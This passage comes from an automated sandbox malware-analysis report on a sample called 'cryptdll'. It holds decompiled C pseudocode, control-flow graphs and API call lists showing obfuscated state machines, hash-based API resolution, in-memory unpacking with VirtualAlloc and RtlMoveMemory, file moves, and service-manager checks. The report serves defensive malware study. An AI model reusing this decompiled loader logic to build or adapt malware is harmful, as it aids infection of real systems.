                                                        0x00629aa2
                                                        0x00629ab5
                                                        0x00629aba
                                                        0x00629aba
                                                        0x00629ac7
                                                        0x00629ac9
                                                        0x00629ace
                                                        0x00629ad0
                                                        0x00629b4f
                                                        0x00629b58
                                                        0x00629ad2
                                                        0x00629ad2
                                                        0x00629ad9
                                                        0x00000000
                                                        0x00629ad9
                                                        0x006299f3
                                                        0x006299f3
                                                        0x006299f8
                                                        0x00629a47
                                                        0x00629a49
                                                        0x00629a61
                                                        0x00629a61
                                                        0x00629a67
                                                        0x00629a69
                                                        0x00000000
                                                        0x006299fa
                                                        0x006299fa
                                                        0x006299ff
                                                        0x00000000
                                                        0x00629a05
                                                        0x00629a05
                                                        0x00629a0d
                                                        0x00629a12
                                                        0x00629a17
                                                        0x00629a1f
                                                        0x00629a24
                                                        0x00629a2c
                                                        0x00629a31
                                                        0x00629a38
                                                        0x00000000
                                                        0x00629a38
                                                        0x006299ff
                                                        0x006299f8
                                                        0x006299ed
                                                        0x00000000
                                                        0x00629aea
                                                        0x00629aea
                                                        0x00629aea
                                                        0x00629b01
                                                        0x00000000

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,008DDFE0), ref: 0062997D
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 006299BB
                                                        • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 00629A67
                                                        • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 00629B33
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, Offset: 00620000, based on PE: true
                                                        • Associated: 0000000E.00000002.2292147578.0000000000620000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292182201.000000000062D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292198739.000000000062F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_620000_cryptdll.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPath$CloseHandleManagerOpenService
                                                        • String ID: 2S$Y4[0
                                                        • API String ID: 2382770032-4131004879
                                                        • Opcode ID: 12050f55c8182333225bc581e036437f8c2a2119fa17d85cd83f664c117767f6
                                                        • Instruction ID: dbfd5d5248e9f1bdcab0d3e5db41d637ea7d092f077b8616da10bfbc90e28983
                                                        • Opcode Fuzzy Hash: 12050f55c8182333225bc581e036437f8c2a2119fa17d85cd83f664c117767f6
                                                        • Instruction Fuzzy Hash: 8561E530B04B254BEB68AF68BC857AA7297E7D0744F14082EF145DB351EA35CD068FB6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 105 628400-6284df 106 6284e3-6284e9 105->106 107 6285c8-6285ce 106->107 108 6284ef 106->108 109 628630-628637 107->109 110 6285d0-6285d6 107->110 111 6284f5-6284fb 108->111 112 62866c-6286b4 call 62b6e0 108->112 113 628654-628667 109->113 114 628639-62864f call 623f00 call 623e60 109->114 115 6285b1-6285b7 110->115 116 6285d8-6285e0 110->116 117 62854a-628551 111->117 118 6284fd-628503 111->118 121 6285bd-6285c7 112->121 134 6286ba 112->134 113->106 114->113 115->106 115->121 124 6285e2-6285fa call 623f00 call 623e60 116->124 125 628600-628624 CreateFileW 116->125 122 628553-628569 call 623f00 call 623e60 117->122 123 62856e-628591 117->123 126 628543-628548 118->126 127 628505-62850b 118->127 122->123 148 628593-6285a9 call 623f00 call 623e60 123->148 149 6285ae 123->149 124->125 125->121 135 628626-62862b 125->135 126->106 127->115 133 628511-628518 127->133 139 628535-628541 133->139 140 62851a-628530 call 623f00 call 623e60 133->140 142 6286c4-6286d1 134->142 143 6286bc-6286be 134->143 135->106 139->106 140->139 143->121 143->142 148->149 149->115
                                                        C-Code - Quality: 66%
                                                        			E00628400(void* __ebx, void* __ebp) {
                                                        				short _v524;
                                                        				char _v564;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				signed int _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				intOrPtr _v596;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t92;
                                                        				intOrPtr* _t93;
                                                        				void* _t95;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        				void* _t99;
                                                        				void* _t100;
                                                        				void* _t101;
                                                        				signed int _t119;
                                                        				void* _t121;
                                                        				void* _t122;
                                                        				signed int _t123;
                                                        				intOrPtr _t124;
                                                        				void* _t126;
                                                        				void* _t129;
                                                        
                                                        				_t126 = __ebp;
                                                        				_t101 = __ebx;
                                                        				_v584 = 0xdbec;
                                                        				_v584 = _v584 + 0xa437;
                                                        				_v584 = _v584 | 0x0afcf5fb;
                                                        				_v584 = _v584 ^ 0x9493ba05;
                                                        				_v584 = _v584 >> 0xc;
                                                        				_v584 = _v584 >> 0xb;
                                                        				_v584 = _v584 ^ 0x000001bc;
                                                        				_v592 = 0x7d19;
                                                        				_v592 = _v592 << 9;
                                                        				_v592 = _v592 >> 0xe;
                                                        				_v592 = _v592 + 0xffff07e5;
                                                        				_v592 = _v592 | 0x8aea6eef;
                                                        				_v592 = _v592 + 0xd867;
                                                        				_v592 = _v592 + 0x9c41;
                                                        				_v592 = _v592 + 0x3de0;
                                                        				_v592 = _v592 + 0x218b;
                                                        				_v592 = _v592 ^ 0x00014403;
                                                        				_v588 = 0x2591;
                                                        				_t123 = 0x4a20241;
                                                        				_v588 = _v588 * 0x7d;
                                                        				_v588 = _v588 + 0x8d68;
                                                        				_v588 = _v588 + 0xffff8911;
                                                        				_v588 = _v588 * 0x6a;
                                                        				_v588 = _v588 + 0xffff93d5;
                                                        				_v588 = _v588 ^ 0x07a13cd2;
                                                        				_v580 = 0x789;
                                                        				_v580 = _v580 >> 1;
                                                        				_v580 = _v580 ^ 0xaee58af2;
                                                        				_v580 = _v580 ^ 0xaee58936;
                                                        				_t122 = _v580;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t129 = _t123 - 0x1aed34c4;
                                                        						if(_t129 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t129 == 0) {
                                                        							_v580 = 0xa8c00;
                                                        							_v576 = 0;
                                                        							_v596 = E0062B6E0(_v580, _v576, 0x989680, 0);
                                                        							_v592 = _t119;
                                                        							_t121 = _v588 - _v564;
                                                        							_t124 = _v596;
                                                        							asm("sbb ecx, [esp+0x3c]");
                                                        							__eflags = _v584 - _v592;
                                                        							if(__eflags < 0) {
                                                        								goto L16;
                                                        							} else {
                                                        								if(__eflags > 0) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									__eflags = _t121 - _t124;
                                                        									if(_t121 < _t124) {
                                                        										goto L16;
                                                        									} else {
                                                        										goto L29;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(_t123 == 0x12f5064) {
                                                        								_t82 =  *0x62dec0;
                                                        								__eflags = _t82;
                                                        								if(_t82 == 0) {
                                                        									_t99 = E00623F00(0x9bab0b12);
                                                        									_t119 = 0x8b0c7279;
                                                        									_t82 = E00623E60(_t101, _t99, 0x8b0c7279, _t126);
                                                        									 *0x62dec0 = _t82;
                                                        								}
                                                        								 *_t82(_t122, 0,  &_v564, 0x28);
                                                        								asm("sbb esi, esi");
                                                        								_t85 =  *0x62de3c;
                                                        								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
                                                        								__eflags = _t85;
                                                        								if(_t85 == 0) {
                                                        									_t98 = E00623F00(0x9bab0b12);
                                                        									_t119 = 0x20de7595;
                                                        									_t85 = E00623E60(_t101, _t98, 0x20de7595, _t126);
                                                        									 *0x62de3c = _t85;
                                                        								}
                                                        								 *_t85(_t122);
                                                        								goto L15;
                                                        							} else {
                                                        								if(_t123 == 0x4a20241) {
                                                        									_t123 = 0x33602029;
                                                        									continue;
                                                        								} else {
                                                        									if(_t123 != 0xd59c266) {
                                                        										goto L15;
                                                        									} else {
                                                        										_t93 =  *0x62e1d4;
                                                        										if(_t93 == 0) {
                                                        											_t97 = E00623F00(0x9bab0b12);
                                                        											_t119 = 0xa229df38;
                                                        											_t93 = E00623E60(_t101, _t97, 0xa229df38, _t126);
                                                        											 *0x62e1d4 = _t93;
                                                        										}
                                                        										 *_t93( &_v572);
                                                        										_t123 = 0x1aed34c4;
                                                        										continue;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t123 - 0x33602029;
                                                        					if(_t123 == 0x33602029) {
                                                        						_t75 =  *0x62e3f4;
                                                        						__eflags = _t75;
                                                        						if(_t75 == 0) {
                                                        							_t100 = E00623F00(0x9bab0b12);
                                                        							_t119 = 0x7dc9b9bb;
                                                        							_t75 = E00623E60(_t101, _t100, 0x7dc9b9bb, _t126);
                                                        							 *0x62e3f4 = _t75;
                                                        						}
                                                        						 *_t75(0,  &_v524, 0x104);
                                                        						_t123 = 0x3ae77736;
                                                        						goto L1;
                                                        					} else {
                                                        						__eflags = _t123 - 0x3ae77736;
                                                        						if(_t123 != 0x3ae77736) {
                                                        							goto L15;
                                                        						} else {
                                                        							__eflags =  *0x62de04;
                                                        							if( *0x62de04 == 0) {
                                                        								_t95 = E00623F00(0x9bab0b12);
                                                        								_t119 = 0xb66d748a;
                                                        								 *0x62de04 = E00623E60(_t101, _t95, 0xb66d748a, _t126);
                                                        							}
                                                        							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
                                                        							_t122 = _t92;
                                                        							__eflags = _t122 - 0xffffffff;
                                                        							if(_t122 == 0xffffffff) {
                                                        								break;
                                                        							} else {
                                                        								_t123 = 0x12f5064;
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L15:
                                                        					__eflags = _t123 - 0x13ef6fdf;
                                                        				} while (_t123 != 0x13ef6fdf);
                                                        				L16:
                                                        				__eflags = 0;
                                                        				return 0;
                                                        				goto L30;
                                                        			}






























                                                        0x00628400
                                                        0x00628400
                                                        0x00628406
                                                        0x0062840e
                                                        0x00628416
                                                        0x0062841e
                                                        0x00628426
                                                        0x0062842b
                                                        0x00628430
                                                        0x00628438
                                                        0x00628440
                                                        0x00628445
                                                        0x0062844a
                                                        0x00628452
                                                        0x0062845a
                                                        0x00628462
                                                        0x0062846a
                                                        0x00628472
                                                        0x0062847a
                                                        0x00628482
                                                        0x00628491
                                                        0x00628496
                                                        0x0062849a
                                                        0x006284a2
                                                        0x006284af
                                                        0x006284b3
                                                        0x006284bb
                                                        0x006284c3
                                                        0x006284cb
                                                        0x006284cf
                                                        0x006284d7
                                                        0x006284df
                                                        0x006284df
                                                        0x006284e3
                                                        0x006284e3
                                                        0x006284e3
                                                        0x006284e3
                                                        0x006284e9
                                                        0x00000000
                                                        0x00000000
                                                        0x006284ef
                                                        0x0062866e
                                                        0x00628676
                                                        0x00628696
                                                        0x0062869a
                                                        0x006286a2
                                                        0x006286a6
                                                        0x006286aa
                                                        0x006286b2
                                                        0x006286b4
                                                        0x00000000
                                                        0x006286ba
                                                        0x006286ba
                                                        0x006286c5
                                                        0x006286d1
                                                        0x006286bc
                                                        0x006286bc
                                                        0x006286be
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x006286be
                                                        0x006286ba
                                                        0x006284f5
                                                        0x006284fb
                                                        0x0062854a
                                                        0x0062854f
                                                        0x00628551
                                                        0x00628558
                                                        0x0062855d
                                                        0x00628564
                                                        0x00628569
                                                        0x00628569
                                                        0x00628578
                                                        0x0062857c
                                                        0x0062857e
                                                        0x00628589
                                                        0x0062858f
                                                        0x00628591
                                                        0x00628598
                                                        0x0062859d
                                                        0x006285a4
                                                        0x006285a9
                                                        0x006285a9
                                                        0x006285af
                                                        0x00000000
                                                        0x006284fd
                                                        0x00628503
                                                        0x00628543
                                                        0x00000000
                                                        0x00628505
                                                        0x0062850b
                                                        0x00000000
                                                        0x00628511
                                                        0x00628511
                                                        0x00628518
                                                        0x0062851f
                                                        0x00628524
                                                        0x0062852b
                                                        0x00628530
                                                        0x00628530
                                                        0x0062853a
                                                        0x0062853c
                                                        0x00000000
                                                        0x0062853c
                                                        0x0062850b
                                                        0x00628503
                                                        0x006284fb
                                                        0x00000000
                                                        0x006284ef
                                                        0x006285c8
                                                        0x006285ce
                                                        0x00628630
                                                        0x00628635
                                                        0x00628637
                                                        0x0062863e
                                                        0x00628643
                                                        0x0062864a
                                                        0x0062864f
                                                        0x0062864f
                                                        0x00628660
                                                        0x00628662
                                                        0x00000000
                                                        0x006285d0
                                                        0x006285d0
                                                        0x006285d6
                                                        0x00000000
                                                        0x006285d8
                                                        0x006285de
                                                        0x006285e0
                                                        0x006285e7
                                                        0x006285ec
                                                        0x006285fa
                                                        0x006285fa
                                                        0x0062861d
                                                        0x0062861f
                                                        0x00628621
                                                        0x00628624
                                                        0x00000000
                                                        0x00628626
                                                        0x00628626
                                                        0x00000000
                                                        0x00628626
                                                        0x00628624
                                                        0x006285d6
                                                        0x00000000
                                                        0x006285b1
                                                        0x006285b1
                                                        0x006285b1
                                                        0x006285bd
                                                        0x006285bd
                                                        0x006285c7
                                                        0x00000000

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 0062861D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, Offset: 00620000, based on PE: true
                                                        • Associated: 0000000E.00000002.2292147578.0000000000620000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292182201.000000000062D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292198739.000000000062F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_620000_cryptdll.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: ) `3$) `3$6w:$6w:$=
                                                        • API String ID: 823142352-4124229693
                                                        • Opcode ID: fa82ebb1bace768a8528beea5b9eb9f9c5edaac25abbe2bc06ebd30a009c38e7
                                                        • Instruction ID: b5ddbfaf3fda8bb291c783bc3479bceec864e451f6246c475535431ac646bb49
                                                        • Opcode Fuzzy Hash: fa82ebb1bace768a8528beea5b9eb9f9c5edaac25abbe2bc06ebd30a009c38e7
                                                        • Instruction Fuzzy Hash: BA612671A097229FC754DF28E84566FBBE6ABD0714F00881DF49997390DB78DD098F82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 160 610d60-610dd5 call 610ed0 VirtualAlloc RtlMoveMemory 164 610ddb-610dde 160->164 165 610ebe-610ec4 160->165 164->165 166 610de4-610de6 164->166 166->165 168 610dec-610df0 166->168 168->165 169 610df6-610dfd 168->169 170 610e03-610e36 call 611140 RtlMoveMemory 169->170 171 610eaf-610ebb 169->171 170->165 175 610e3c-610e4a VirtualAlloc 170->175 176 610e89-610ea0 RtlFillMemory 175->176 177 610e4c-610e52 175->177 176->165 183 610ea2-610ea5 176->183 178 610e54-610e56 177->178 179 610e5a-610e68 177->179 178->179 179->165 180 610e6a-610e7d RtlMoveMemory 179->180 180->165 182 610e7f-610e83 180->182 182->165 184 610e85 182->184 183->165 185 610ea7-610ea9 183->185 184->176 185->170 185->171
                                                        APIs
                                                          • Part of subcall function 00610FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00610F08
                                                          • Part of subcall function 00610FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00610F3E
                                                          • Part of subcall function 00610FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00610F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00610DB4
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00610DC3
                                                          • Part of subcall function 00611140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00610EFD,00000000), ref: 00611155
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 00610E11
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00610E3D
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00610E6C
                                                        • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 00610E98
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292138449.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_610000_cryptdll.jbxd
                                                        Similarity
                                                        • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                        • String ID:
                                                        • API String ID: 3581289920-0
                                                        • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction ID: 1567a6da01245b10c7bf68dc38875fc681ca2ea4e10dc92f8d1c9e627c85ccc9
                                                        • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction Fuzzy Hash: B631E375A043406BEB14DB21CC44AEB73EBEBC9381F084D2CF64897351DAB5D9C08766
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 186 623780-623793 187 6237b0-6237c5 186->187 188 623795-6237ab call 623f00 call 623e60 186->188 193 6237e2-6237fa 187->193 194 6237c7-6237dd call 623f00 call 623e60 187->194 188->187 199 623817-623832 193->199 200 6237fc-623812 call 623f00 call 623e60 193->200 194->193 207 623834-62384a call 623f00 call 623e60 199->207 208 62384f-62385e 199->208 200->199 207->208 213 623860-623876 call 623f00 call 623e60 208->213 214 62387b-6238b4 208->214 213->214 221 6238d1-6238e2 SHFileOperationW 214->221 222 6238b6-6238cc call 623f00 call 623e60 214->222 222->221
                                                        C-Code - Quality: 62%
                                                        			E00623780(void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                        				char _v520;
                                                        				char _v528;
                                                        				char _v536;
                                                        				char _v1040;
                                                        				char _v1056;
                                                        				short _v1072;
                                                        				char* _v1076;
                                                        				char* _v1080;
                                                        				intOrPtr _v1084;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t14;
                                                        				intOrPtr* _t16;
                                                        				intOrPtr* _t18;
                                                        				intOrPtr* _t20;
                                                        				signed int _t26;
                                                        				void* _t36;
                                                        				void* _t63;
                                                        				void* _t66;
                                                        				void* _t69;
                                                        				void* _t70;
                                                        				void* _t71;
                                                        				void* _t72;
                                                        				struct _SHFILEOPSTRUCTW* _t73;
                                                        
                                                        				_t70 =  &_v1072;
                                                        				_t12 =  *0x62ddc0;
                                                        				_t66 = __ecx;
                                                        				_t63 = __edx;
                                                        				if(_t12 == 0) {
                                                        					_t12 = E00623E60(_t36, E00623F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x62ddc0 = _t12;
                                                        				}
                                                        				 *_t12( &_v1072, 0, 0x1e);
                                                        				_t14 =  *0x62ddc0;
                                                        				_t71 = _t70 + 0xc;
                                                        				if(_t14 == 0) {
                                                        					_t14 = E00623E60(_t36, E00623F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x62ddc0 = _t14;
                                                        				}
                                                        				 *_t14( &_v1040, 0, 0x208);
                                                        				_t16 =  *0x62ddc0;
                                                        				_t72 = _t71 + 0xc;
                                                        				if(_t16 == 0) {
                                                        					_t16 = E00623E60(_t36, E00623F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x62ddc0 = _t16;
                                                        				}
                                                        				 *_t16( &_v520, 0, 0x208);
                                                        				_t18 =  *0x62e298;
                                                        				_t73 = _t72 + 0xc;
                                                        				if(_t18 == 0) {
                                                        					_t18 = E00623E60(_t36, E00623F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x62e298 = _t18;
                                                        				}
                                                        				 *_t18( &_v1040, _t66);
                                                        				_t20 =  *0x62e298;
                                                        				if(_t20 == 0) {
                                                        					_t20 = E00623E60(_t36, E00623F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x62e298 = _t20;
                                                        				}
                                                        				 *_t20( &_v528, _t63);
                                                        				_v1084 = 1;
                                                        				_v1080 =  &_v1056;
                                                        				_v1076 =  &_v536;
                                                        				_v1072 = 0xe14;
                                                        				if( *0x62e30c == 0) {
                                                        					 *0x62e30c = E00623E60(_t36, E00623F00(0xd9518805), 0x262a6194, _t69);
                                                        				}
                                                        				_t26 = SHFileOperationW(_t73); // executed
                                                        				asm("sbb eax, eax");
                                                        				return  ~_t26 + 1;
                                                        			}


























                                                        0x00623785
                                                        0x00623780
                                                        0x0062378c
                                                        0x0062378f
                                                        0x00623793
                                                        0x006237a6
                                                        0x006237ab
                                                        0x006237ab
                                                        0x006237b9
                                                        0x006237bb
                                                        0x006237c0
                                                        0x006237c5
                                                        0x006237d8
                                                        0x006237dd
                                                        0x006237dd
                                                        0x006237ee
                                                        0x006237f0
                                                        0x006237f5
                                                        0x006237fa
                                                        0x0062380d
                                                        0x00623812
                                                        0x00623812
                                                        0x00623826
                                                        0x00623828
                                                        0x0062382d
                                                        0x00623832
                                                        0x00623845
                                                        0x0062384a
                                                        0x0062384a
                                                        0x00623855
                                                        0x00623857
                                                        0x0062385e
                                                        0x00623871
                                                        0x00623876
                                                        0x00623876
                                                        0x00623884
                                                        0x0062388a
                                                        0x00623892
                                                        0x0062389d
                                                        0x006238a6
                                                        0x006238b4
                                                        0x006238cc
                                                        0x006238cc
                                                        0x006238d5
                                                        0x006238d9
                                                        0x006238e2

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, Offset: 00620000, based on PE: true
                                                        • Associated: 0000000E.00000002.2292147578.0000000000620000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292182201.000000000062D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292198739.000000000062F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_620000_cryptdll.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileOperation
                                                        • String ID: X~$X~$X~
                                                        • API String ID: 3080627654-3258893172
                                                        • Opcode ID: fcf7cd00859187926a0e798468e084170c7841dd9227db7da09c152fc460eb40
                                                        • Instruction ID: 15326bb8a372f7d651ee823e99cf448dc4fc65047bb6954606c136fcd60af92e
                                                        • Opcode Fuzzy Hash: fcf7cd00859187926a0e798468e084170c7841dd9227db7da09c152fc460eb40
                                                        • Instruction Fuzzy Hash: 7231BE70700B214BD724AB79EC017AB37EBAB84704F10492DB555CB385EB38DA068F95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 228 628e80-628e98 229 628ea0-628ea5 228->229 230 628f7a-628f7f 229->230 231 628eab 229->231 232 629011-629016 230->232 233 628f85-628f8a 230->233 234 628eb1-628eb6 231->234 235 628f3f-628f46 231->235 232->229 238 628fce-628fd5 233->238 239 628f8c-628f91 233->239 240 62901b-629022 234->240 241 628ebc-628ec1 234->241 236 628f63-628f75 235->236 237 628f48-628f5e call 623f00 call 623e60 235->237 236->229 237->236 243 628ff2-62900c OpenServiceW 238->243 244 628fd7-628fed call 623f00 call 623e60 238->244 247 628f93-628fa3 239->247 248 628fbb-628fc0 239->248 245 629024-62903a call 623f00 call 623e60 240->245 246 62903f 240->246 249 628ec3-628ec8 241->249 250 628efc-628f03 241->250 243->229 244->243 245->246 261 629042-629049 246->261 257 628fa5-628fac 247->257 258 628fae-628fb6 247->258 248->229 260 628fc6-628fcd 248->260 249->248 259 628ece-628ed5 249->259 253 628f20-628f2f 250->253 254 628f05-628f1b call 623f00 call 623e60 250->254 253->261 278 628f35-628f3a 253->278 254->253 257->257 257->258 258->229 266 628ef2-628efa 259->266 267 628ed7-628eed call 623f00 call 623e60 259->267 266->229 267->266 278->229
                                                        C-Code - Quality: 66%
                                                        			E00628E80() {
                                                        				short* _v4;
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t4;
                                                        				void* _t6;
                                                        				intOrPtr* _t11;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t19;
                                                        				intOrPtr* _t22;
                                                        				void* _t25;
                                                        				void* _t42;
                                                        				short* _t43;
                                                        				intOrPtr _t44;
                                                        				short* _t45;
                                                        				void* _t46;
                                                        				void* _t47;
                                                        
                                                        				_t25 = _v4;
                                                        				_t4 = 0x1779a150;
                                                        				_t46 = _v4;
                                                        				_t43 = _v4;
                                                        				_t42 = 0;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t47 = _t4 - 0xebfcc22;
                                                        						if(_t47 <= 0) {
                                                        							break;
                                                        						}
                                                        						if(_t4 == 0x1779a150) {
                                                        							_t4 = 0x23287775;
                                                        							continue;
                                                        						} else {
                                                        							if(_t4 == 0x1e3d7119) {
                                                        								if( *0x62e270 == 0) {
                                                        									 *0x62e270 = E00623E60(_t25, E00623F00(0x26f5757c), 0x56e230f9, _t46);
                                                        								}
                                                        								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
                                                        								_t25 = _t6;
                                                        								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
                                                        								continue;
                                                        							} else {
                                                        								if(_t4 != 0x23287775) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t44 =  *0x62e54c; // 0x8ddff8
                                                        									_t45 = _t44 + 0x260;
                                                        									while( *_t45 != 0x5c) {
                                                        										_t45 = _t45 + 2;
                                                        									}
                                                        									_t43 = _t45 + 2;
                                                        									_t4 = 0x10ada17;
                                                        									continue;
                                                        								}
                                                        							}
                                                        						}
                                                        						L32:
                                                        					}
                                                        					if(_t47 == 0) {
                                                        						_t11 =  *0x62e4c8;
                                                        						if(_t11 == 0) {
                                                        							_t11 = E00623E60(_t25, E00623F00(0x26f5757c), 0xe9d3e51f, _t46);
                                                        							 *0x62e4c8 = _t11;
                                                        						}
                                                        						 *_t11(_t25);
                                                        						_t42 =  !=  ? 1 : _t42;
                                                        						_t4 = 0xd10de09;
                                                        						goto L1;
                                                        					} else {
                                                        						if(_t4 == 0xbf6010) {
                                                        							_t15 =  *0x62e18c;
                                                        							if(_t15 == 0) {
                                                        								_t15 = E00623E60(_t25, E00623F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        								 *0x62e18c = _t15;
                                                        							}
                                                        							 *_t15(_t46);
                                                        							goto L31;
                                                        						} else {
                                                        							if(_t4 == 0x10ada17) {
                                                        								_t19 =  *0x62e310;
                                                        								if(_t19 == 0) {
                                                        									_t19 = E00623E60(_t25, E00623F00(0x26f5757c), 0x9ba7cd1, _t46);
                                                        									 *0x62e310 = _t19;
                                                        								}
                                                        								_t46 =  *_t19(0, 0, 0xf003f);
                                                        								if(_t46 == 0) {
                                                        									L31:
                                                        									return _t42;
                                                        								} else {
                                                        									_t4 = 0x1e3d7119;
                                                        									goto L1;
                                                        								}
                                                        							} else {
                                                        								if(_t4 != 0xd10de09) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t22 =  *0x62e18c;
                                                        									if(_t22 == 0) {
                                                        										_t22 = E00623E60(_t25, E00623F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        										 *0x62e18c = _t22;
                                                        									}
                                                        									 *_t22(_t25);
                                                        									_t4 = 0xbf6010;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L32;
                                                        					L22:
                                                        				} while (_t4 != 0x2dd4caa9);
                                                        				return _t42;
                                                        				goto L32;
                                                        			}




















                                                        0x00628e82
                                                        0x00628e86
                                                        0x00628e8c
                                                        0x00628e91
                                                        0x00628e96
                                                        0x00628e98
                                                        0x00628ea0
                                                        0x00628ea0
                                                        0x00628ea0
                                                        0x00628ea0
                                                        0x00628ea5
                                                        0x00000000
                                                        0x00000000
                                                        0x00628f7f
                                                        0x00629011
                                                        0x00000000
                                                        0x00628f85
                                                        0x00628f8a
                                                        0x00628fd5
                                                        0x00628fed
                                                        0x00628fed
                                                        0x00628ff9
                                                        0x00628ffb
                                                        0x00629009
                                                        0x00000000
                                                        0x00628f8c
                                                        0x00628f91
                                                        0x00000000
                                                        0x00628f93
                                                        0x00628f93
                                                        0x00628f99
                                                        0x00628fa3
                                                        0x00628fa5
                                                        0x00628fa8
                                                        0x00628fae
                                                        0x00628fb1
                                                        0x00000000
                                                        0x00628fb1
                                                        0x00628f91
                                                        0x00628f8a
                                                        0x00000000
                                                        0x00628f7f
                                                        0x00628eab
                                                        0x00628f3f
                                                        0x00628f46
                                                        0x00628f59
                                                        0x00628f5e
                                                        0x00628f5e
                                                        0x00628f64
                                                        0x00628f6d
                                                        0x00628f70
                                                        0x00000000
                                                        0x00628eb1
                                                        0x00628eb6
                                                        0x0062901b
                                                        0x00629022
                                                        0x00629035
                                                        0x0062903a
                                                        0x0062903a
                                                        0x00629040
                                                        0x00000000
                                                        0x00628ebc
                                                        0x00628ec1
                                                        0x00628efc
                                                        0x00628f03
                                                        0x00628f16
                                                        0x00628f1b
                                                        0x00628f1b
                                                        0x00628f2b
                                                        0x00628f2f
